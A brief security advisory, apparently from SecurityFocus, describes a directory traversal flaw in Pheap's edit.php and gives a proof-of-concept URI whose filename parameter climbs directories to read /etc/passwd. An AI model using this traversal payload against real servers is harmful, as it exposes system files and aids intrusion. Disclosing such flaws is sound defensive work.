Pheap Edit.PHP Directory Traversal Vulnerability

Attackers may exploit this vulnerability via a web client.

The following proof-of-concept URI is available:

http://www.example.com/edit.php?em=file&filename=../../../../../../../../../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus